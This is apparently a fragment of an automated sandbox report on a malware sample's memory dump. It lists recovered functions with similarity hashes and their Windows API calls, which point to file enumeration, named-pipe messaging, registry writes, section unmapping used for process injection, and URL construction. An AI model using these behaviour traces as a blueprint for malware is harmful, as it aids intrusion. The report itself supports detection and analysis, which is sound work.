  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5816, Relevance: 10.6, APIs: 7, Instructions: 109 Total matches: 43stringsleepmemory
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5C23, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59 Total matches: 27stringtime
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6996, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110 Total matches: 35
Similarity
  • Total matches: 35
  • API ID: FlushFileBuffersGetLastErrormemset
  • String ID: K$P
  • API String ID: 1157411244-420285281
  • Opcode ID: b776852dc2126f9b1b4d2b6506190c96010406ec9a84ebb4623d6614876d6961
  • Instruction ID: 690a8b8b9a9b9257472a4c9e9031e2b6228afbf5fdb6d6ed7caf7786d6f424c8
  • Opcode Fuzzy Hash: 8CF07B5009DB0086D877E4020147FC67EA2B782DC5C94B7E134D1B2F5F2E10914AD758
  • Instruction Fuzzy Hash: 690a8b8b9a9b9257472a4c9e9031e2b6228afbf5fdb6d6ed7caf7786d6f424c8
APIs
  • memset.NTDLL ref: 001D6A41
  • FlushFileBuffers.KERNEL32(00000000), ref: 001D6AA8
  • GetLastError.KERNEL32(?,00000000,00000000), ref: 001D6AB2
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C26C0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106 Total matches: 4memorystring
Similarity
  • Total matches: 4
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID: W
  • API String ID: 168078221-655174618
  • Opcode ID: b9da9fa840bf6074c408ec4bac05ea25fd3e186289c4e2afa14c93c02e877af3
  • Instruction ID: da849983bae2cba88ba3f639a5f23240e47ef508a0620d7c4692c40c99cf5b5e
  • Opcode Fuzzy Hash: 70F049740108C689C00738799034776A140BFB12E5C8D7B31EA1A7968E7F62759A6B19
  • Instruction Fuzzy Hash: da849983bae2cba88ba3f639a5f23240e47ef508a0620d7c4692c40c99cf5b5e
APIs
  • lstrlen.KERNEL32(00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000,00000000,00000001,?,?,001CD506,00000000), ref: 001C2752
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001C2765
  • lstrcpy.KERNEL32(00000004,00000000), ref: 001C2783
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,001EC202), ref: 001C27A9
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
